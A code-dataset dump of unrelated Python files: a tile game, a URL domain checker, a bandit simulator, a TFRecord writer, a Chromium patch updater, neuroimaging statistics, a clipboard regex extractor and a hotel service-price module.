compare(list):\r\n return True\r\n return False\r\n\r\ndef check_if_same(icons, lp_icon, icon, tile_x, tile_y):\r\n values = []\r\n for i in range(4):\r\n if icon[i] == lp_icon[i]:\r\n values.append(1)\r\n else:\r\n values.append(0)\r\n return (values)\r\n\r\ndef compare(list):\r\n for i in range(4):\r\n count = 0\r\n for j in range(4):\r\n count += list[j][i]\r\n if count == 4:\r\n return True\r\n return False \r\n \r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"Sklenda.py","file_name":"Sklenda.py","file_ext":"py","file_size_in_byte":14893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"490030322","text":"import functools\nfrom urllib.parse import urlparse\n\nfrom gatling_gun.error.error_text import ErrorText\nfrom gatling_gun.constants.gg_constants import GGConstants\n\nclass DomainManager():\n \"\"\"\n Collects all the methods that deal with verifying and/or formatting data that has to do with\n our set of known domains.\n \"\"\"\n\n @staticmethod\n def are_known(urls):\n \"\"\"\n Verify that each url in a list of urls comes from a domain that we know how to parse.\n\n Parameters:\n -----------\n urls: a list of urls (strings) to verify\n\n 
Returns:\n --------\n true if everything checks out, else false.\n \"\"\"\n dm = DomainManager\n if not urls:\n return True\n else:\n return functools.reduce(lambda x, y: x and y, [dm.verify_url(url) for url in urls])\n\n @staticmethod\n def verify_url(url):\n \"\"\"\n Verify that the given url comes from a domain that we know how to parse.\n\n Parameters:\n -----------\n url: the url to verify\n\n Returns:\n --------\n true if everything checks out, else false.\n \"\"\"\n domain = DomainManager.resolve(url)\n\n if domain in GGConstants.KNOWN_DOMAINS.values():\n return True\n else:\n return False\n\n @staticmethod\n def find_unknown_urls(urls):\n \"\"\"\n Parameters:\n -----------\n urls: a list of urls to search for unknown domains.\n\n Returns:\n --------\n a list of all the urls in @urls that come from unknown domains.\n \"\"\"\n return [x for x in urls if not DomainManager.verify_url(x)]\n\n @staticmethod\n def resolve(url):\n \"\"\"\n Get the domain from a url\n\n Parameters:\n -----------\n url:\n\n Returns:\n --------\n the domain of @url\n \"\"\"\n parsed = urlparse(url)\n\n if not parsed.scheme or not parsed.netloc:\n print(ErrorText.invalid_url(url))\n return None\n else:\n return '{uri.scheme}://{uri.netloc}/'.format(uri = parsed)\n\n @staticmethod\n def toronto_star(domain):\n \"\"\"\n Returns:\n --------\n true if @domain is the domain of the Toronto Star website\n \"\"\"\n gg = GGConstants\n if domain == gg.KNOWN_DOMAINS[gg.TORONTO_STAR]:\n return True\n else:\n return False\n\n @staticmethod\n def blog_to(domain):\n \"\"\"\n Returns:\n --------\n True if @domain is the domain of the BlogTO website\n \"\"\"\n gg = GGConstants\n if domain == gg.KNOWN_DOMAINS[gg.BLOG_TO]:\n return True\n else:\n return False\n","sub_path":"gatling_gun/web/domain_manager.py","file_name":"domain_manager.py","file_ext":"py","file_size_in_byte":2743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"430701805","text":"import numpy as np\n\n\ndef simulate(runs, times, bandits, envs):\n rewards = np.zeros((len(bandits), runs, times))\n for i, bandit in enumerate(bandits):\n env = envs[i]\n for r in range(runs):\n bandit.init()\n env.init()\n for t in range(times):\n action = bandit.act()\n reward = env.step(action)\n bandit.step(reward)\n rewards[i, r, t] = reward\n mean_rewards = rewards.mean(axis=1)\n return mean_rewards","sub_path":"RL/Multi-armedBandits/simulate.py","file_name":"simulate.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"555963306","text":"import os\nimport random\nimport xml.etree.ElementTree as ET\n\nimport tensorflow as tf\n\n\ndef int64_feature(value):\n \"\"\"Wrapper for inserting int64 features into Example proto.\n \"\"\"\n if not isinstance(value, list):\n value = [value]\n return tf.train.Feature(int64_list=tf.train.Int64List(value=value))\n\n\ndef float_feature(value):\n \"\"\"Wrapper for inserting float features into Example proto.\n \"\"\"\n if not isinstance(value, list):\n value = [value]\n return tf.train.Feature(float_list=tf.train.FloatList(value=value))\n\n\ndef bytes_feature(value):\n \"\"\"Wrapper for inserting bytes features into Example proto.\n \"\"\"\n if not isinstance(value, list):\n value = [value]\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=value))\n\n\nDEFUALT_PATHS = {\n 'images': '/mnt/disk/chenyifeng/VOC2012/JPEGImages',\n 'annotations': 
'/mnt/disk/chenyifeng/VOC2012/Annotations',\n 'segmentations': '/mnt/disk/chenyifeng/VOC2012/SegmentationClassAug'\n}\n\n\nclass PascalVocWriter:\n \"\"\"\n PASCAL VOC 2012 DataSet to TF record Writer\n \"\"\"\n\n def __init__(self, paths=DEFUALT_PATHS):\n self.img_path = paths['images']\n self.ano_path = paths['annotations']\n self.sgm_path = paths['segmentations']\n def convert_to_example(self, file_name):\n img_path = os.path.join(self.img_path, file_name + '.jpg')\n ano_path = os.path.join(self.ano_path, file_name + '.xml')\n sgm_path = os.path.join(self.sgm_path, file_name + '.png')\n\n img_data = tf.gfile.FastGFile(img_path, 'rb').read()\n sgm_data = tf.gfile.FastGFile(sgm_path, 'rb').read()\n\n # img_data = imread(img_path).tostring()\n # sgm_data = imread(sgm_path).tostring()\n\n anno_tree = ET.parse(ano_path)\n anno_root = anno_tree.getroot()\n\n # is_sgmt = int(anno_root.find('segmented').text)\n # if is_sgmt == 0:\n # print('{} is not a Segmentation Sample. So Skipped'.format(file_name))\n\n size = anno_root.find('size')\n shape = [int(size.find('height').text),\n int(size.find('width').text),\n int(size.find('depth').text)]\n\n image_format = b'JPEG'\n segment_format = b'PNG'\n\n example = tf.train.Example(\n features=tf.train.Features(\n feature={\n 'image/name':bytes_feature(file_name.encode()),\n 'image/height': int64_feature(shape[0]),\n 'image/width': int64_feature(shape[1]),\n 'image/channels': int64_feature(shape[2]),\n 'image/shape': int64_feature(shape),\n 'image/format': bytes_feature(image_format),\n 'image/encoded': bytes_feature(img_data),\n 'label/format': bytes_feature(segment_format),\n 'label/encoded': bytes_feature(sgm_data)\n }\n )\n )\n return example\n\n def add_to_record(self, file_name, tfrecord_writer):\n example = self.convert_to_example(file_name)\n tfrecord_writer.write(example.SerializeToString())\n\n def run(self, pic_names, output_dir, shuffling=False, size=300):\n if shuffling:\n random.seed(1314)\n random.shuffle(pic_names)\n\n total_num = len(pic_names)\n\n for start in range(0, total_num, size):\n tf_filename = '%s/%03d.tfrecord' % (output_dir, start // size)\n tf_recorder = tf.python_io.TFRecordWriter(tf_filename)\n print('=>' * (start * 5 // total_num) + '{:.0f}% Finished'.format(start / total_num * 100))\n for pic_idx in range(start, min(start + 300, total_num)):\n pic_name = pic_names[pic_idx]\n self.add_to_record(pic_name, tf_recorder)\n\n print('=>' * 5 + '{:.0f}% Finished'.format(100))\n\n\ndef convert_val():\n writer = PascalVocWriter()\n pic_names = open('/mnt/disk/chenyifeng/VOC2012/ImageSets/Segmentation/val.txt').readlines()\n pic_names = [i.strip(' \\n') for i in pic_names]\n writer.run(pic_names, output_dir='/mnt/disk/chenyifeng/VOC2012/tf_segments/tf_records/val')\n\n\ndef convert_train():\n writer = PascalVocWriter()\n pic_names = open('/mnt/disk/chenyifeng/VOC2012/ImageSets/Segmentation/train.txt').readlines()\n pic_names = [i.strip(' \\n') for i in pic_names]\n writer.run(pic_names, output_dir='/mnt/disk/chenyifeng/VOC2012/tf_segments/tf_records/train')\n\n\nif __name__ == '__main__':\n # convert_train()\n convert_val()\n","sub_path":"datasets/pasval_voc_writer.py","file_name":"pasval_voc_writer.py","file_ext":"py","file_size_in_byte":4522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"530828088","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# Copyright (C) 2020 ByTanuky\n# This program is free software: you can redistribute it and/or modify\n# it under the 
terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n\nimport os\nimport subprocess\nimport sys\nimport re\n\nfrom ordered_set import OrderedSet\n\nfrom constants import CHROMIUM_SRC_DIR, PATCHES_DIR, PATCH_LIST_FILE\nfrom utils import get_patch_filename, get_original_filename\n\nGIT_DIFF_PATTERN = 'diff --git '\n\nEXCLUSION_FILES = [\n # locale resources\n 'chrome/app/chromium_strings.grd',\n 'chrome/app/settings_chromium_strings.grdp',\n 'chrome/app/settings_strings.grdp',\n 'components/components_chromium_strings.grd',\n # branding resources\n 'chrome/app/theme/chromium/BRANDING',\n]\n\n\ndef main(args):\n ret = subprocess.check_output(\n ['git', 'checkout'], cwd=CHROMIUM_SRC_DIR).decode('utf-8').split('\\n')\n if len(ret) < 3:\n print('No diff available.')\n exit(0)\n\n ret = ret[:-3]\n total = len(ret)\n print('Updating files...')\n\n new_patch_list = OrderedSet()\n\n unified_diff = subprocess.check_output(\n ['git', 'diff', '--ignore-space-at-eol'],\n cwd=CHROMIUM_SRC_DIR\n ).decode('utf-8')\n\n splitted = unified_diff.split(GIT_DIFF_PATTERN)\n regex = re.compile('(?<=a/)(.*)(?= b/)')\n\n i = 0\n for entry in splitted:\n if len(entry) == 0:\n continue\n\n filename = regex.findall(entry)[0]\n\n if filename in EXCLUSION_FILES:\n total -= 1\n continue\n\n new_patch_list.add(filename)\n patch_filename = get_patch_filename(filename)\n\n print('[%d/%d]' % (i, total), filename)\n\n # write to file\n with open(os.path.join(PATCHES_DIR, patch_filename), 'w', newline='\\n') as f:\n f.write(GIT_DIFF_PATTERN)\n f.write(entry)\n\n i += 1\n\n # remove old patches\n if os.path.exists(PATCH_LIST_FILE):\n print('Removing old patches...')\n\n removed_count = 0\n old_patches = os.listdir(PATCHES_DIR)\n for op in old_patches:\n if not op.endswith('.patch'):\n continue\n\n orig_filename = get_original_filename(op)\n if orig_filename not in new_patch_list:\n os.remove(os.path.join(PATCHES_DIR, op))\n removed_count += 1\n print('Removed %d unused patch(es).' 
% removed_count)\n\n print('Writing new patch list...')\n with open(PATCH_LIST_FILE, 'w') as f:\n f.writelines('\\n'.join(new_patch_list))\n\n print('Patches updated.')\n\n return 0\n\n\nif __name__ == '__main__':\n sys.exit(main(sys.argv[1:]))\n","sub_path":"scripts/update_patches.py","file_name":"update_patches.py","file_ext":"py","file_size_in_byte":3135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"635168105","text":"import heapq\n\nT = int(input())\n\nfor t in range(T):\n N = int(input())\n\n bids = {}\n\n for n in range(N):\n f, d = [int(i) for i in input().split(\" \")]\n try:\n bids[d].append(f)\n except:\n bids[d] = [f]\n\n result = [i for i in sorted(bids.items(), key=lambda b: b[0], reverse=True)]\n\n # print(result)\n possible = []\n answer = 0\n interval = result[0][0]\n for i in result:\n for j in range(interval - i[0]):\n if possible:\n answer += -heapq.heappop(possible)\n for k in i[1]:\n heapq.heappush(possible, -k)\n\n answer += -heapq.heappop(possible)\n\n interval = i[0] - 1\n # print(answer)\n\n for j in range(interval):\n if possible:\n answer += -heapq.heappop(possible)\n\n # print(\"answer: \", answer)\n print(answer)\n\n\n# h = []\n#\n# heapq.heappush(h, -1)\n# heapq.heappush(h, [-3, -4])\n# heapq.heappush(h, -5)\n# heapq.heappush(h, -2)\n# heapq.heappush(h, -10)\n# heapq.heappush(h, -4)\n#\n# print(heapq.heappop(h))\n# print(heapq.heappop(h))\n# print(heapq.heappop(h))\n#\n# print(h)","sub_path":"CSED331/ASSN4/Exhibition.py","file_name":"Exhibition.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"62101348","text":"import warnings\nimport numpy as np\nimport scipy as sp\nfrom scipy import cluster as scl\nfrom nilearn import input_data as nid\nfrom sklearn import linear_model as sln\nfrom sklearn import preprocessing as skp\n\n\ndef pearson_r(data, pheno, covariate_name):\n # Remove missing values\n mask = ~pheno[covariate_name].isnull().values\n covariate = pheno[covariate_name]\n contrast_name = f'Pearson_r with {covariate_name}'\n r, p = sp.stats.pearsonr(data[mask], covariate[mask])\n result = {'pearson_r': r,\n 'p': p,\n 'contrast': contrast_name}\n return result\n\n\ndef t_test(data, pheno, group, case, control):\n # We cannot assume that the index is reset or consecutive from 0,\n # Let's instead get the precise position\n case_idx = np.array([pheno.index.get_loc(idx) for idx in pheno.query(f'{group} == \"{case}\"').index.values])\n control_idx = np.array([pheno.index.get_loc(idx) for idx in pheno.query(f'{group} == \"{control}\"').index.values])\n contrast_name = f'T_Test of {group}: {case} vs {control}'\n\n n_case = len(case_idx)\n n_control = len(control_idx)\n t, p = sp.stats.ttest_ind(data[case_idx], data[control_idx])\n mean_case = np.mean(data[case_idx])\n mean_control = np.mean(data[control_idx])\n pooled_std = np.sqrt((((n_case - 1) * np.square(np.std(data[case_idx]))) +\n ((n_control - 1) * np.square(np.std(data[case_idx])))) / (n_case + n_control - 2))\n cohens = (mean_case - mean_control) / pooled_std\n results = {'t': t,\n 'p': p,\n 'cohens_d': cohens,\n 'mean_case': mean_case,\n 'mean_control': mean_control,\n 'contrast': contrast_name,\n 'pooled_sd': pooled_std}\n return results\n\n\ndef mann_whitney_test(data, pheno, group, case, control):\n # We cannot assume that the index is reset or consecutive from 0,\n # Let's instead get the precise position\n case_idx = 
np.array([pheno.index.get_loc(idx) for idx in pheno.query(f'{group} == \"{case}\"').index.values])\n    control_idx = np.array([pheno.index.get_loc(idx) for idx in pheno.query(f'{group} == \"{control}\"').index.values])\n    contrast_name = f'Mann_Whitney_U of {group}: {case} vs {control}'\n\n    n_case = len(case_idx)\n    n_control = len(control_idx)\n    u_right, p = sp.stats.mannwhitneyu(data[case_idx], data[control_idx], alternative='two-sided')\n    median_case = np.median(data[case_idx])\n    median_control = np.median(data[control_idx])\n    u_left = n_case * n_control - u_right\n    u_min = np.min([u_left, u_right])\n    # Compute rank biserial correlation\n    r_b = 1 - (2 * u_min) / (n_case * n_control)\n    # Determine if cases > controls or reverse\n    case_gt_con = u_right > u_min\n    if not case_gt_con:\n        r_b = -r_b\n    results = {'U': u_min, 'p': p,\n               'rank_biserial_correlation': r_b,\n               'median_case': median_case,\n               'median_control': median_control,\n               'contrast': contrast_name}\n    return results\n\n\ndef corr2_coeff(A, B):\n    # Rowwise mean of input arrays & subtract from input arrays themselves\n    A_mA = A - A.mean(1)[:, None]\n    B_mB = B - B.mean(1)[:, None]\n\n    # Sum of squares across rows\n    ssA = (A_mA ** 2).sum(1)\n    ssB = (B_mB ** 2).sum(1)\n\n    # Finally get corr coeff\n    return np.dot(A_mA, B_mB.T) / np.sqrt(np.dot(ssA[:, None], ssB[None]))\n\n\ndef partial_seed_correlation(functional_image, atlas_image, mask_image):\n    \"\"\"\n    Return seed maps for each of the seed regions in 'atlas_image' while correcting for the average signal in all\n    other seed regions.\n\n    :param functional_image: subject level 4D nibabel image file\n    :param atlas_image: 3D nibabel image with integers for ROIs and 0 as background\n    :param mask_image: 3D nibabel image with 0 as background and 1 as brain\n    :return:\n    \"\"\"\n    roi_masker = nid.NiftiMasker(mask_img=mask_image, verbose=0, standardize=False)\n    atlas_masker = nid.NiftiLabelsMasker(labels_img=atlas_image,\n                                         mask_img=mask_image,\n                                         standardize=False)\n    voxel_masker = nid.NiftiMasker(mask_img=mask_image, verbose=0, standardize=True)\n\n    atlas = roi_masker.fit_transform(atlas_image)\n    unique_rois = np.unique(atlas[atlas != 0])\n    atlas_timeseries = atlas_masker.fit_transform(functional_image)\n\n    seed_maps = list()\n    for roi_id in range(atlas_timeseries.shape[1]):\n        roi = unique_rois[roi_id]\n        conf_id = [i for i in range(atlas_timeseries.shape[1]) if not i == roi_id]\n        confound_timeseries = atlas_timeseries[:, conf_id]\n\n        seed_atlas_i = roi_masker.inverse_transform(atlas == roi)\n        seed_masker_stand = nid.NiftiLabelsMasker(labels_img=seed_atlas_i,\n                                                  mask_img=mask_image,\n                                                  standardize=True)\n\n        voxel_timeseries = voxel_masker.fit_transform(functional_image, confounds=confound_timeseries)\n        seed_timeseries = seed_masker_stand.fit_transform(functional_image, confounds=confound_timeseries)\n        seed_correlation = np.dot(voxel_timeseries.T, seed_timeseries) / voxel_timeseries.shape[0]\n        seed_maps.append(seed_correlation)\n\n    seed_map_array = np.concatenate(seed_maps, -1)\n    seed_correlations_fisher_z = np.arctanh(seed_map_array)\n    return seed_correlations_fisher_z\n\n\n\ndef confound_corrected_seed_correlation(functional_image, atlas_image, mask_image, confound_image):\n    \"\"\"\n\n    :param functional_image: 4D nibabel image with time in the 4th dimension\n    :param atlas_image: 3D nibabel image with 0 as background and integer values denoting ROIs\n    :param mask_image: 3D mask image\n    :param confound_image: A nibabel image with a single ROI for which we will compute the ROI timeseries and regress\n                           it from the voxel timeseries in the functional image before generating the seed maps.\n                           Can only contain a single region.\n    
:return:\n \"\"\"\n confound_masker = nid.NiftiLabelsMasker(labels_img=confound_image, mask_img=mask_image, standardize=False)\n voxel_masker = nid.NiftiMasker(mask_image, verbose=0, standardize=False)\n\n confound_ts = confound_masker.fit_transform(functional_image)\n resid_ts = voxel_masker.fit_transform(functional_image, confounds=confound_ts)\n resid_image = voxel_masker.inverse_transform(resid_ts)\n return seed_correlation(resid_image, atlas_image, mask_image)\n\n\ndef seed_correlation(functional_image, atlas_image, mask_image):\n \"\"\"\n\n :param functional_image: 4D nibabel image with time in the 4th dimension\n :param atlas_image: 3D nibabel image with integers for ROIs and 0 as background\n :param mask_image: 3D nibabel image with 0 as background and 1 as brain.\n :return: fisher z transformed correlations. shape = (n_voxels, n_regions)\n \"\"\"\n atlas_masker = nid.NiftiLabelsMasker(labels_img=atlas_image, mask_img=mask_image, standardize=True)\n brain_masker = nid.NiftiMasker(mask_image, verbose=0, standardize=True)\n seed_time_series = atlas_masker.fit_transform(functional_image)\n brain_time_series = brain_masker.fit_transform(functional_image)\n\n seed_correlations = np.dot(brain_time_series.T, seed_time_series) / seed_time_series.shape[0]\n seed_correlations_fisher_z = np.arctanh(seed_correlations)\n\n # seed_based_correlation_img = brain_masker.inverse_transform(seed_correlations_fisher_z.T)\n return seed_correlations_fisher_z\n\n\ndef nuisance_correction(data_stack, design_matrix, n_jobs=1):\n \"\"\"\n :param data_stack: 2D or 3D array of (n_subjects, n_voxels, n_seeds)\n :param design_matrix: patsy or numpy style design matrix (n_subjects, n_factors)\n :param n_jobs:\n :return: residuals as 2D or 3D array of same dimensions as input array\n \"\"\"\n model = sln.LinearRegression(fit_intercept=False, normalize=False, n_jobs=n_jobs)\n if data_stack.ndim == 3:\n n_seeds = data_stack.shape[2]\n residuals = np.stack([nuisance_correction(data_stack[..., seed_id], design_matrix, n_jobs)\n for seed_id in range(n_seeds)], -1)\n else:\n results = model.fit(design_matrix, data_stack)\n residuals = data_stack - results.predict(design_matrix)\n\n return residuals\n\n\ndef subtype_maps(data_stack, part, method=np.mean):\n \"\"\"\n\n :param data_stack: (n_subject, n_voxel, n_seed (optional)). 2D or 3D array of the data\n :param part: (n_subject, n_seed (optional) 1D or 2D array of subtype partitions. Zero values are ignored to allow\n for thresholded subtypes\n :param method: A function reference to compute the subtype map. 
Default is numpy.mean\n :return: numpy array for 2D input and list of numpy arrays for 3D input\n \"\"\"\n if data_stack.ndim == 3 or part.ndim == 2:\n if not (data_stack.ndim == 3 and part.ndim == 2) or not data_stack.shape[-1] == part.shape[-1]:\n raise Exception(f'data and part must have the same last dimension when run across seeds: '\n f'data({data_stack.shape}), part({part.shape})')\n n_iter = part.shape[-1]\n sbt_maps = [subtype_maps(data_stack[..., i], part[..., i]) for i in range(n_iter)]\n else:\n n_subtypes = np.sum(np.unique(part) != 0)\n sbt_maps = np.array([method(data_stack[part == sbt_id, :], 0) for sbt_id in range(1, n_subtypes + 1)])\n return sbt_maps\n\n\ndef constrain_partition(partition, min_cases=2):\n \"\"\"\n\n :param partition: 1D partition vector where each unique number corresponds to a part\n :param min_cases: the minimum number of occurrences for a part to be kept in the constrained partition\n :return:\n \"\"\"\n masked_partition = np.array([0 if sum(partition == p) < min_cases else p for p in partition])\n # The remaining elements will always be sorted so 0 can remain 0\n remaining_elements = list(np.unique(masked_partition))\n if 0 in remaining_elements:\n # Reassign values to the remaining partitions\n constrained_partition = np.array([remaining_elements.index(p) for p in masked_partition])\n else:\n # Nothing to do, all elements of the partition are more frequent than required\n constrained_partition = masked_partition\n\n return constrained_partition\n\n\ndef subtype_partition(data_stack, mode='classic', n_subtypes=3, dist_thr=0.7, part_thr=20):\n \"\"\"\n\n :param data_stack: 2D or 3D array (n_subjects, n_connections, n_seeds) (last optional)\n :param n_subtypes: int\n :param mode: str. Either 'classic' for regular subtypes, 'core' for thresholded subtypes, or 'relative' to have the\n thresholds interpreted as rank percentages.\n :param dist_thr: float. Thresholds clusters by cophenetic distance\n :param part_thr: int. Only keep parts that have at least this many occurrences.\n :return:\n \"\"\"\n if data_stack.ndim == 3:\n # Process recursively and stack the results along the last (new) dimension\n n_iter = data_stack.shape[2]\n part, dist, order = list(map(lambda x: np.stack(x, -1),\n zip(*[subtype_partition(data_stack[..., i], mode, n_subtypes, dist_thr, part_thr)\n for i in range(n_iter)])))\n else:\n if mode == 'classic':\n # Normalize to 0 mean and unit variance across voxels per subject\n norm = skp.scale(data_stack, axis=1)\n # Get the lower triangle of the distance metric\n dist = sp.spatial.distance.pdist(norm)\n # Build the cluster\n link = scl.hierarchy.linkage(dist, method='ward', optimal_ordering=True)\n order = scl.hierarchy.dendrogram(link, no_plot=True)['leaves']\n part = scl.hierarchy.fcluster(link, n_subtypes, criterion='maxclust')\n elif mode == 'core':\n sim = np.corrcoef(data_stack)\n dist = 1 - sim[np.triu(np.ones(shape=sim.shape), 1).astype(bool)]\n link = scl.hierarchy.linkage(dist, method='average', optimal_ordering=True)\n order = scl.hierarchy.dendrogram(link, no_plot=True)['leaves']\n full_partition = scl.hierarchy.fcluster(link, dist_thr, criterion='distance')\n part = constrain_partition(full_partition, min_cases=part_thr)\n if np.max(part) == 0:\n warnings.warn(f'Cannot find any subtypes that satisfy the criteria! 
Partition is empty.\\n'\n                              f' Subtyping {data_stack.shape[0]} cases in {mode} mode with a distance cutoff of '\n                              f'{dist_thr} and a minimum number of cases per subtype of {part_thr} ')\n        elif mode == 'relative':\n            sim = np.corrcoef(data_stack)\n            n_subject = sim.shape[0]\n            part_thr_emp = np.ceil(n_subject * part_thr).astype(int)\n            dist = 1 - sim[np.triu(np.ones(shape=sim.shape), 1).astype(bool)]\n            dist_thr_emp = np.percentile(dist, dist_thr)\n            link = scl.hierarchy.linkage(dist, method='average', optimal_ordering=True)\n            order = scl.hierarchy.dendrogram(link, no_plot=True)['leaves']\n            full_partition = scl.hierarchy.fcluster(link, dist_thr_emp, criterion='distance')\n            part = constrain_partition(full_partition, min_cases=part_thr_emp)\n            if np.max(part) == 0:\n                warnings.warn(f'Cannot find any subtypes that satisfy the criteria! Partition is empty.\\n'\n                              f' Subtyping {data_stack.shape[0]} cases in {mode} mode with a distance cutoff of '\n                              f'{dist_thr_emp } and a minimum number of cases per subtype of {part_thr_emp} ')\n        else:\n            raise Exception(f'{mode} is not implemented as mode to generate subtypes. Please use \"classic\", \"core\" or \"relative\".')\n\n    return part, dist, order\n\n\ndef subtype_weights(data_stack, subtypes):\n    \"\"\"\n\n    :param subtypes: 2D array of shape (n_subtype, n_voxel) or a list of 2D arrays, one for each seed region\n    :param data_stack: 2D or 3D array of shape (n_subjects, n_voxel, n_seeds) - last optional\n    :return: weight matrix as 2D or 3D array with shape (n_subjects, n_subtypes, n_seeds) - last optional\n    \"\"\"\n    if not type(subtypes) == list:\n        if subtypes.size == 0:\n            warnings.warn(f'I encountered an empty subtype map. This can happen if the corresponding partition that '\n                          f'generated these subtypes was thresholded until there were no individuals in a subtype '\n                          f'left. I will not crash here but I will return all NaN weights. Goodbye.')\n            # I will create all-NaN weights if the subtype map is an empty array (indicating that this is a seed\n            # without any satisfactory subtypes)\n            weights = np.empty(shape=(data_stack.shape[0], 1))\n            weights[:] = np.nan\n\n        elif not subtypes.ndim == 2 or not data_stack.ndim == 2:\n            raise Exception(f'subtypes and data must have the same dimensions: '\n                            f'subtypes ({subtypes.ndim}; {type(subtypes)}) '\n                            f'data ({data_stack.ndim}; {type(data_stack)})')\n\n        else:\n            weights = corr2_coeff(data_stack, subtypes)\n    else:\n        if not len(subtypes) == data_stack.shape[2]:\n            raise Exception(f'Data is 3D but the number of seed regions is mismatched between subtypes and data: '\n                            f'subtype ({len(subtypes)}) and data ({data_stack.shape[2]})')\n        n_seeds = len(subtypes)\n        weights = [subtype_weights(data_stack[..., seed_id], subtypes[seed_id]) for seed_id in range(n_seeds)]\n    return weights\n\n\ndef compute_icc(ratings, cse, kind):\n    \"\"\"\n    Computes the intraclass correlations for indexing the reliability analysis\n    according to Shrout & Fleiss' schema.\n\n    ratings - ratings data matrix, data whose rows represent different\n              ratings/raters & whose columns represent different cases or\n              targets being measured. 
Each target is assumed to be a random\n              sample from a population of targets.\n    cse - 1, 2 or 3: 1 if each target is measured by a different set of\n          raters from a population of raters, 2 if each target is measured\n          by the same raters, but these raters are sampled from a\n          population of raters, 3 if each target is measured by the same\n          raters and these raters are the only raters of interest.\n    kind - 'single' or 'k': denotes whether the ICC is based on a single\n           measurement or on an average of k measurements, where\n           k = the number of ratings/raters.\n\n    % REFERENCE:\n% Shrout PE, Fleiss JL. Intraclass correlations: uses in assessing rater\n% reliability. Psychol Bull. 1979;86:420-428\n%\n% NOTE:\n% This code was mainly modified from Kevin's code on the web.\n% (London kevin.brownhill@kcl.ac.uk)\n%\n% XINIAN ZUO\n% Email: zuoxinian@gmail.com\n\n% if isanova\n%     [p,table,stats] = anova1(x',{},'off');\n%     ICC=(table{2,4}-table{3,4})/(table{2,4}+table{3,3}/(table{2,3}+1)*table{3,4});\n% else\n    \"\"\"\n\n    # k is the number of raters, and n is the number of targets\n    k, n = ratings.shape\n    # mean per target\n    mpt = np.mean(ratings, 0)\n    # mean per rater\n    mpr = np.mean(ratings, 1)\n    # get total mean\n    tm = np.mean(ratings)\n    # within target sum squares\n    wss = np.sum(np.square(ratings - mpt))\n    # within target mean squares\n    wms = wss / (n * (k - 1))\n    # between rater sum squares\n    rss = np.sum(np.square(mpr - tm)) * n\n    # between rater mean squares\n    rms = rss / (k - 1)\n    # between target sum squares\n    bss = np.sum(np.square(mpt - tm)) * k\n    # between target mean squares\n    bms = bss / (n - 1)\n    # residual sum of squares\n    ess = wss - rss\n    # residual mean squares\n    ems = ess / ((k - 1) * (n - 1))\n\n    if cse == 1:\n        if kind == 'single':\n            icc = (bms - wms) / (bms + (k - 1) * wms)\n        elif kind == 'k':\n            icc = (bms - wms) / bms\n        else:\n            raise Exception(f'Wrong value for \"kind\": {kind}')\n    elif cse == 2:\n        if kind == 'single':\n            icc = (bms - ems) / (bms + (k - 1) * ems + k * (rms - ems) / n)\n        elif kind == 'k':\n            icc = (bms - ems) / (bms + (rms - ems) / n)\n        else:\n            raise Exception(f'Wrong value for \"kind\": {kind}')\n    elif cse == 3:\n        if kind == 'single':\n            icc = (bms - ems) / (bms + (k - 1) * ems)\n        elif kind == 'k':\n            icc = (bms - ems) / bms\n        else:\n            raise Exception(f'Wrong value for \"kind\": {kind}')\n    else:\n        raise Exception(f'Wrong value for \"cse\": {cse}')\n    return icc, wms, bms\n","sub_path":"asdfc/.ipynb_checkpoints/stats-checkpoint.py","file_name":"stats-checkpoint.py","file_ext":"py","file_size_in_byte":18612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"206429272","text":"#! 
python \n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jul 3 09:37:58 2018\n@author: Chen YC\n\"\"\"\n\nimport pyperclip\nimport re\n\n\n\ntext = pyperclip.paste()\n\npatternPhone = r'.?(\\d\\d.?\\d\\d\\d\\d?-?\\d\\d\\d\\d)'\npatternEmail=r'([A-Za-z0-9\\._%]+@.+\\w)'\n\npatternPhone=re.compile(patternPhone)\npatternEmail = re.compile(patternEmail)\n\nmoPhone=patternPhone.findall(text)\nmoEmail=patternEmail.findall(text)\n\ntextPhone=','.join(moPhone)\ntextEmail=','.join(moEmail)\nprint(moPhone)\nprint(moEmail)\n\npyperclip.copy(textPhone)\npyperclip.copy(textEmail)\n\nprint('the phone and email are copied to the clipboard')","sub_path":"regularExpressionProject.py","file_name":"regularExpressionProject.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"301681888","text":"# -*- coding: utf-8 -*-\n'''Module containing the functions for service administration (insertions, listing, modifications...)\n'''\nimport variables, conexion\n\ndef listPrecios():\n    '''Function that lists the prices of the basic services.\n\n    @return:\n    '''\n    try:\n        conexion.cur.execute('SELECT PRECIO FROM PRECIOS WHERE SERVICIO IN (\"DESAYUNO\", \"COMIDA\", \"PARKING\")')\n        listadoPrecios = conexion.cur.fetchall()\n        conexion.conex.commit()\n        for i in range(3):\n            variables.entDialogoServicios[i].set_text(str(listadoPrecios[i][0]))\n\n    except Exception as e:\n        print('Error in funcionesServicios ', e)\n\ndef cambiarPrecios():\n    '''Function that modifies the prices of the basic services.\n\n    @return:\n    '''\n    try:\n        servicios = ('DESAYUNO', 'COMIDA', 'PARKING')\n        for i in range(3):\n            conexion.cur.execute('UPDATE PRECIOS SET PRECIO = ? WHERE SERVICIO = ?', 